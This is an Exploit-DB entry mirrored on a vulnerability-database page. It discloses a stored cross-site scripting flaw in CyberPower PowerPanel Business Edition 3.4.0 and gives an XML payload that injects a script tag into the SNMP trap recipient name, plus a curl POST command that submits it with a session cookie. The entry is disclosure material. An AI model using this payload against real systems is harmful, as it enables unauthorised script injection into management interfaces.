Search...

PowerPanel Business Edition - Cross-Site Scripting

2019-07-01T00:00:00

ID EDB-ID:47059
Type exploitdb
Reporter Joey Lane
Modified 2019-07-01T00:00:00

Description

                                        
                                            # Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting (SNMP trap receivers)
# Google Dork: None
# Date: 6/29/2019
# Exploit Author: Joey Lane
# Vendor Homepage: https://www.cyberpowersystems.com
# Version: 3.4.0
# Tested on: Ubuntu 16.04
# CVE : Pending

CyberPower PowerPanel Business Edition 3.4.0 contains a stored cross site scripting vulnerability.  The fields used to configure SNMP trap receivers are not being properly sanitized.  This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Event Action / Recipient page.

To demonstrate the vulnerability, create a file named 'xss.xml' with the following contents:

&lt;?xml version="1.0" encoding="UTF-8" ?&gt;
&lt;ppbe&gt;
&lt;target&gt;
&lt;command&gt;action.notification.trapRecipient.setup&lt;/command&gt;
&lt;/target&gt;
&lt;inquire&gt;
&lt;trapRecipientSetup&gt;
&lt;action&gt;ADD&lt;/action&gt;
&lt;trapRecipient&gt;
&lt;name&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/name&gt;
&lt;status&gt;true&lt;/status&gt;
&lt;type&gt;1&lt;/type&gt;
&lt;ipAddress&gt;127.0.0.1&lt;/ipAddress&gt;
&lt;community&gt;public&lt;/community&gt;
&lt;/trapRecipient&gt;
&lt;/trapRecipientSetup&gt;
&lt;/inquire&gt;
&lt;/ppbe&gt;

Now execute the following curl command to submit a POST request with the contents of the 'xss.xml' file:

curl -X POST -H 'Content-type: text/xml' -d @xss.xml --cookie "JSESSIONID=(A VALID SESSION ID)" http://(A VALID HOST):3052/agent/ppbe.xml

Visiting the Event Action / Recipient page will execute the posted javascript code.

JSON Vulners Source

Initial Source

{"id": "EDB-ID:47059", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "PowerPanel Business Edition - Cross-Site Scripting", "description": "", "published": "2019-07-01T00:00:00", "modified": "2019-07-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/47059", "reporter": "Joey Lane", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-01-13T05:32:41", "viewCount": 46, "enchantments": {"dependencies": {}, "score": {"value": 4.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2019-13070"]}]}, "exploitation": null, "vulnersScore": 4.7}, "sourceHref": "https://www.exploit-db.com/download/47059", "sourceData": "# Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting (SNMP trap receivers)\r\n# Google Dork: None\r\n# Date: 6/29/2019\r\n# Exploit Author: Joey Lane\r\n# Vendor Homepage: https://www.cyberpowersystems.com\r\n# Version: 3.4.0\r\n# Tested on: Ubuntu 16.04\r\n# CVE : Pending\r\n\r\nCyberPower PowerPanel Business Edition 3.4.0 contains a stored cross site scripting vulnerability. The fields used to configure SNMP trap receivers are not being properly sanitized. This allows an authenticated user to inject arbitrary javascript code, which will later be executed once a user returns to the Event Action / Recipient page.\r\n\r\nTo demonstrate the vulnerability, create a file named 'xss.xml' with the following contents:\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\r\n<ppbe>\r\n<target>\r\n<command>action.notification.trapRecipient.setup</command>\r\n</target>\r\n<inquire>\r\n<trapRecipientSetup>\r\n<action>ADD</action>\r\n<trapRecipient>\r\n<name><script>alert(1)</script></name>\r\n<status>true</status>\r\n<type>1</type>\r\n<ipAddress>127.0.0.1</ipAddress>\r\n<community>public</community>\r\n</trapRecipient>\r\n</trapRecipientSetup>\r\n</inquire>\r\n</ppbe>\r\n\r\nNow execute the following curl command to submit a POST request with the contents of the 'xss.xml' file:\r\n\r\ncurl -X POST -H 'Content-type: text/xml' -d @xss.xml --cookie \"JSESSIONID=(A VALID SESSION ID)\" http://(A VALID HOST):3052/agent/ppbe.xml\r\n\r\nVisiting the Event Action / Recipient page will execute the posted javascript code.", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1645595184}}